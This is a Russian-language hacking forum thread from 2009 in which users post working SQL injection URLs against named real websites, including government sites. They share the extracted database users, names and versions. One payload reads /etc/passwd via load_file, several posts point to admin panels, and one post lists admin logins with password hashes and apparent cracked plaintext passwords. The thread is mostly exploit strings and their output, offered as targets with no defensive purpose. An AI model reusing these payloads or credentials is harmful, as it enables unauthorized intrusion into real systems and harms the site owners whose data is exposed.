ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8511  
Старый 23.03.2009, 00:39
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.kcsoul.com/urban-events-calendar/detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
user() : database() : version()
sherryml_genuser@localhost : sherryml_db : 5.0.45-community
 
Ответить с цитированием

  #8512  
Старый 23.03.2009, 00:49
Аватар для ПаВлУшКа
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Код:
http://www.ppi-jepang.org/print.php?id=-61+union+select+1,2,3,version(),5,6,7--
Код:
http://ebursa.depdiknas.go.id/pustaka/ptk/record.php?id=-28%20union%20select%201,2,table_name%20from%20information_schema.tables--
 
Ответить с цитированием

  #8513  
Старый 23.03.2009, 01:10
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.mef.gov.kh/new_mef/macroeconomic-detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6
user() : database() : version()
mefgovkh_web@216.65.1.253 : mefgovkh_web : 5.0.32-Debian_7etch5~bpo31+1-log
 
Ответить с цитированием

  #8514  
Старый 23.03.2009, 01:17
Аватар для Морок
Морок
Новичок
Регистрация: 06.03.2009
Сообщений: 5
Провел на форуме:
10850

Репутация: 16
По умолчанию

http://www.passionforstone.eu/index.php?id_sect=-1+union+select+concat_ws(0x3a3a,user(),database(), version())--

Админка по адресу: http://www.passionforstone.eu/admin/login.php

В базе отсутствуют поля отвечающие за аутентификацию. Или разделение прав или прописано в файлах.
 
Ответить с цитированием

  #8515  
Старый 23.03.2009, 01:39
Аватар для laedafess
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

Код:
http://www.foresia.com/images/index.php?pageid=217204'+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+
user(): Stamco02@stamco.mynewserver.com
database(): stamco
version(): 4.1.22
PR: 3
---------------------------------------------------
Код:
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7+--+
Код:
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7+--+
user(): b2becat@10.0.0.16
database(): Kincrome
version(): 5.0.56sp1-enterprise-gpl
PR: 4
---------------------------------------------------
Код:
http://www.mirabili.it/fotobis.php?idevento=-29+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6/*
user(): mirabilidb@localhost
database(): mirabili_it
version(): 4.0.24_Debian-10sarge3-log
PR: 4
 
Ответить с цитированием

  #8516  
Старый 23.03.2009, 02:11
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://trentondevils.com/page.php?pid=-228+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*

Database Version: 4.1.20-log
Database name: tdevils_db
User name: tdevils@localhost
 
Ответить с цитированием

  #8517  
Старый 23.03.2009, 03:29
Аватар для Морок
Морок
Новичок
Регистрация: 06.03.2009
Сообщений: 5
Провел на форуме:
10850

Репутация: 16
По умолчанию

http://www.initiativeforpeacebuilding.eu/resource.php?c=-1+union+select+1,concat_ws(0x3a3a,user(),version() ,database()),3,4--

http://www.initiativeforpeacebuilding.eu/Admin <- Basic auth
 
Ответить с цитированием

  #8518  
Старый 23.03.2009, 04:48
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.vsmc.com.vn/news_detail.php?id=19+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+limit+1,1
version():5.0.67-community
database():vsmccom_datavsmc
user():vsmccom_sisoft@localhost
 
Ответить с цитированием

  #8519  
Старый 23.03.2009, 15:32
Аватар для ПаВлУшКа
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Код:
http://www.textile.web.id/member/index.php?id=-21+union+select+version(),2,3,4--
Код:
http://www.iwandarmansjah.web.id/medical.php?id=-309+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9--

Последний раз редактировалось jokester; 23.03.2009 в 18:18.. Причина: esqway165.com БОЯН
 
Ответить с цитированием

  #8520  
Старый 23.03.2009, 16:25
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.zeland.ru/index.php?inside=1&page=news&id=-12+union+select+1,2,3,4,5,6--
Database Version: 5.0.67
Database name: b30500_zelan
User name: u30500@78.108.85.11


Цитата:
http://www.lbn.lv/?op=news&id=-1+union+select+1,2,3,4,5--
Database Version: 5.0.24-community-nt-log
Database name: lbn
User name: lbndb@localhost

Вытаскивать из USERS


Цитата:
http://www.alatus.ru/?a=news&id=-87+union+select+1,2,3,4,5/*
Database Version: 4.1.22-standard-log
Database name: alatusr_1
User name: alatusr_user@localhost


ТОВ "Укрреставрацiя"

Цитата:
http://www.ukrrest.kiev.ua/?module=building&id=-5+union+select+1--
Database Version: 5.0.22
Database name: ukrrest_main
User name: ukrrest_root@localhost

Login:admin
Pass:b0fb7de8ea0d4fce95fc0e4ded766b30: 93UhAwTSYRUL4V7p
--
Login:pfnetua
Pass:c82982351c43978caa37cbc4df9c8807: kwfgOSZQxjGL4bDE

Вытаскивать из jos_users


Цитата:
http://www.frentanarent.it/sezioni.php?titolo=news&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.22
Database name: frentana
User name: ftp_frentana@localhost

Login: novatek
Pass: 8b6068265e60d456b7b25160f965bc24 : ??

Последний раз редактировалось .:[melkiy]:.; 23.03.2009 в 16:45..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ